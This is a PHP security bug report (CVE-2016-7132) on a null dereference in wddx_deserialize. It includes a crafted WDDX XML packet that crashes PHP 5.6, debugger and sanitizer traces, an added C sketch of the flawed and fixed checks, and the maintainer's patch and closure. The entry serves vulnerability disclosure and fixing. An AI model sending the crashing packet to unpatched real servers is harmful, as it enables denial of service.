Sec Bug #72799 wddx_deserialize null dereference in php_wddx_pop_element
Submitted: 2016-08-10 04:29 UTC
Modified: 2016-09-05 15:29 UTC
From: fernando at null-life dot com
Assigned: stas
Status: Closed
Package: WDDX related
PHP Version: 5.6.24
OS: *
Private report: No
CVE-ID: 2016-7132
 [2016-08-10 04:29 UTC] fernando at null-life dot com
Description:
------------
If we add an element to a boolean leaf of an XML struct, a null pointer dereference will happen when the element is popped.

Source code:
https://github.com/php/php-src/blob/PHP-5.6.24/ext/wddx/wddx.c#L985

static void php_wddx_pop_element(void *user_data, const XML_Char *name)
{
...
  if (Z_TYPE_P(ent2->data) == IS_ARRAY || Z_TYPE_P(ent2->data) == IS_OBJECT) {
    target_hash = HASH_OF(ent2->data);
...

GDB output
----------

$ gdb -q --args  /home/operac/build2/bin/php -n wdx13bis.php
...
Stopped reason: SIGSEGV
0x00000000015a8f84 in php_wddx_pop_element (user_data=0x7fffffffa200, name=<optimized out>) at /home/operac/build2/php-src-56/ext/wddx/wddx.c:997
997   if (Z_TYPE_P(ent2->data) == IS_ARRAY || Z_TYPE_P(ent2->data) == IS_OBJECT) {
gdb-peda$ bt
#0  0x00000000015a8f84 in php_wddx_pop_element (user_data=0x7fffffffa200, name=<optimized out>) at /home/operac/build2/php-src-56/ext/wddx/wddx.c:997
#1  0x00000000015eca92 in _end_element_handler (user=0x7ffff7f30650, name=<optimized out>) at /home/operac/build2/php-src-56/ext/xml/compat.c:228
...
gdb-peda$ p *ent2
$2 = {
  data = 0x0,                      
  type = ST_BOOLEAN,
  varname = 0x0
}

Test script:
---------------
<?php

$xml = <<<XML
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version="1.0">
    <var name="XXXX">
        <boolean value="1">
            <dateTime>1998-06-12T04:32:12+00</dateTime>
        </boolean>
    </var>
</wddxPacket>
XML;

$array = wddx_deserialize($xml);


Expected result:
----------------
No crash


Actual result:
--------------
operac@hp2:~/testafl/null$ /home/operac/build2/bin/php -v 
PHP 5.6.26-dev (cli) (built: Aug  7 2016 02:21:28) (DEBUG)
Copyright (c) 1997-2016 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2016 Zend Technologies

operac@hp2:~/testafl/null$ /home/operac/build2/bin/php -n wdx2.php
ASAN:SIGSEGV
=================================================================
==18201==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000014 (pc 0x0000015a8f84 bp 0x7ffc7e2c8dc0 sp 0x7ffc7e2c8c80 T0)
    #0 0x15a8f83 in php_wddx_pop_element /home/operac/build2/php-src-56/ext/wddx/wddx.c:997
    #1 0x15eca91 in _end_element_handler /home/operac/build2/php-src-56/ext/xml/compat.c:228
    #2 0x7f3964cac13c  (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x4a13c)
    #3 0x7f3964cb83bc  (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x563bc)
    #4 0x7f3964cb962a in xmlParseChunk (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x5762a)
    #5 0x15efa8a in php_XML_Parse /home/operac/build2/php-src-56/ext/xml/compat.c:605
    #6 0x15c6f82 in php_wddx_deserialize_ex /home/operac/build2/php-src-56/ext/wddx/wddx.c:1175
    #7 0x15c8037 in zif_wddx_deserialize /home/operac/build2/php-src-56/ext/wddx/wddx.c:1387
    #8 0x1d5bdc3 in zend_do_fcall_common_helper_SPEC /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:558
    #9 0x1c0506c in execute_ex /home/operac/build2/php-src-56/Zend/zend_vm_execute.h:363
    #10 0x194cdb2 in zend_execute_scripts /home/operac/build2/php-src-56/Zend/zend.c:1341
    #11 0x169ad0f in php_execute_script /home/operac/build2/php-src-56/main/main.c:2613
    #12 0x1d64d96 in do_cli /home/operac/build2/php-src-56/sapi/cli/php_cli.c:994
    #13 0x4550a0 in main /home/operac/build2/php-src-56/sapi/cli/php_cli.c:1378
    #14 0x7f3963f4b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #15 0x4556b8 in _start (/home/operac/build2/bin/php+0x4556b8)
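
An added C sketch of the condition in the report, not php-src code and not the committed patch: the parent entry's `data` pointer is NULL when its type is read, so the hardened form checks it first. All struct and function names are hypothetical, and the struct layout is modeled on the PHP 5 zval as an assumption; with 8-byte pointers its `type` field sits at offset 0x14, the fault address in the ASAN output above.

```c
#include <stddef.h>
#include <stdio.h>

/* Stand-ins with hypothetical names; field order follows the PHP 5 zval
 * layout (assumption), so a NULL->type read lands at a small fixed offset. */
enum { T_BOOL = 3, T_ARRAY = 4, T_OBJECT = 5 };
typedef struct {
    union { long lval; double dval; struct { char *val; int len; } str; void *ht; } value;
    unsigned int refcount;
    unsigned char type;
    unsigned char is_ref;
} model_zval;
typedef struct { model_zval *data; int type; char *varname; } model_entry;

enum pop_result { POP_ATTACHED, POP_DISCARDED, POP_REJECTED };

/* Address touched when `data` is NULL and the type field is read. */
size_t type_fault_offset(void) { return offsetof(model_zval, type); }

/* Pattern from the report: the parent's data pointer is trusted. */
enum pop_result pop_unchecked(const model_entry *parent) {
    if (parent->data->type == T_ARRAY || parent->data->type == T_OBJECT)
        return POP_ATTACHED;
    return POP_DISCARDED;
}

/* Hardened form: a parent that never received data cannot take children. */
enum pop_result pop_checked(const model_entry *parent) {
    if (parent == NULL || parent->data == NULL)
        return POP_REJECTED;
    return pop_unchecked(parent);
}

int main(void) {
    model_zval arr = { .type = T_ARRAY };
    model_entry container = { &arr, 0, NULL };
    model_entry leaf = { NULL, T_BOOL, NULL };   /* constructed: matches the gdb dump */
    printf("container: %d\n", pop_checked(&container));
    printf("null-data leaf: %d\n", pop_checked(&leaf));
    printf("NULL->type would fault at 0x%zx\n", type_fault_offset());
    return 0;
}
```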

 [2016-08-11 06:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-08-11 06:45 UTC] stas@php.net
The patch in https://gist.github.com/7e603b8b2c76cd6eed9a33a20a9525d4 (also a14fdb9746262549bbbb96abb87338bacd147e1b) should fix it.

Please verify.
 [2016-08-11 20:55 UTC] fernando at null-life dot com
Patch works OK. Thanks.

operac@hp2:~/testafl$ /home/operac/build2/bin/php -n 72799.php
NULL
operac@hp2:~/testafl$ cat 72799.php
<?php

$xml = <<<XML
<?xml version='1.0'?>
<!DOCTYPE wddxPacket SYSTEM 'wddx_0100.dtd'>
<wddxPacket version="1.0">
    <var name="XXXX">
        <boolean value="1">
            <dateTime>1998-06-12T04:32:12+00</dateTime>
        </boolean>
    </var>
</wddxPacket>
XML;

$array = wddx_deserialize($xml);

var_dump($array);
 [2016-08-15 06:00 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-08-17 06:43 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 06:43 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-09-05 15:29 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2016-7132
 
Last updated: Sat Jun 24 11:01:36 2017 UTC